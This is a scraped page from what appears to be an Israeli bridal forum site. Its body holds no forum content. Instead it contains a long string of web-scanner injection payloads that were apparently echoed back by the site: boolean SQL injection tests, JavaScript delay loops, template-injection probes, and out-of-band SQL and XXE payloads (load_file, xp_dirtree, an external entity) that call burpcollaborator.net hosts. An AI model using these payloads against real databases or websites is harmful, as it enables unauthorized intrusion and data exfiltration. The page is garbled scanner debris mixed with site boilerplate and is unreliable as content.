פורום כלות

24ba383c0c423b171f    ' (function(){if(typeof a6d0f==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);a6d0f=1;}}()) '    ' and 3524=3524--    ' and 3523=3524--    ' and 3523=3523--    ' and '3524'='3524    ' and '3523'='3524    ' and '3523'='3523    17108913' or 2719=2719--    17108913' or 2718=2719--    17108913' or 2718=2718--    17108913' or '2719'='2719    17108913' or '2718'='2719    17108913' or '2718'='2718    ' (function(){if(typeof b4187==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);b4187=1;}}()) '    ' and 3951=3952--    ' and 3951=3951--    ' and '3951'='3952    ' and '3951'='3951    18871894' or 9238=9239--    18871894' or 9238=9238--    18871894' or '9238'='9239    ' (select load_file('\\8oxxtkl69bp8w8f8t6d5u6n2ut0q0e32u5i05rtg.burpcollaborator.net\eer')) '    18871894' or '9238'='9238    ');exec master.dbo.xp_dirtree '\j4o89v1hpm5jcjvj9htgah3da4g1gpjda6y1ls9h.burpcollaborator.netftc'--    );exec master.dbo.xp_dirtree '\lf4akxcj0oglnl6lkj4iljefl6r3rrufl792wtki.burpcollaborator.net qz'--    ';exec master.dbo.xp_dirtree '\389sdf51t693g3z3d1x0e17xeoklk9nxeo2jpadz.burpcollaborator.netvfp'--    ;exec master.dbo.xp_dirtree '\vzyk47wtky0v7vqv4tos5typ5gbdb1ep5ftag14q.burpcollaborator.netswo'--    ' (function(){if(typeof f09ff==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);f09ff=1;}}()) '    '||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % cryaw SYSTEM "http://rsngx3ppdutr0rjrxphoyprlyc494x7lb96wxkm.burpcollaborator.net/">%cryaw;]>'),'/l') from dual)||'    ' and 1024=1025--    ' and 1024=1024--    da000%>d46c1'/"<b118b    %}fdec7'/"<b8adc    ' and '1024'='1025    }}b22a7'/"<f9699    ' and '1024'='1024    13675430' or 8667=8668--    13675430' or 8667=8667--    ' (select load_file('\\7owwtjl59ap7w7f7t5d4u5n1us0rsfm3d611osch.burpcollaborator.net\jxs')) '    13675430' or '8667'='8668    13675430' or '8667'='8667    ');exec master.dbo.xp_dirtree '\eas3fq7cvhbeie1efczbgc98gzmyem8az3nyapye.burpcollaborator.netcjm'--    );exec master.dbo.xp_dirtree '\e6l3bq3crh7eeexebcvbcc58cziyam4av2jx6oud.burpcollaborator.netswe'--    ';exec master.dbo.xp_dirtree '\siehn4fq3vjsqs9snq7poqhmoducm0go7fvai16q.burpcollaborator.net sf'--    ;exec master.dbo.xp_dirtree '\1egqjdbzz4f1m151jz3ykzdvkmqli9cx3nrie92y.burpcollaborator.net tz'--    c5577%>cae37'/"<f470f    %}ac94b'/"<c2649    }}a160b'/"<b4cf2    24ba383cd955334145   
עוד ביטויים

כל הזכויות שמורות kala4kala.co.il
פיתוח: LotemX בניית אתרים ובניית רשת חברתית | עיצוב: 2pm
נכנסת להריון? מזל טוב! כנסי לאמא4אמא ותמצאי שם הכל החל ממחשבון הריון , פורום הריון , עגלות לתינוק , סלקלים ועוד זמן טעינה: 0.037 שניות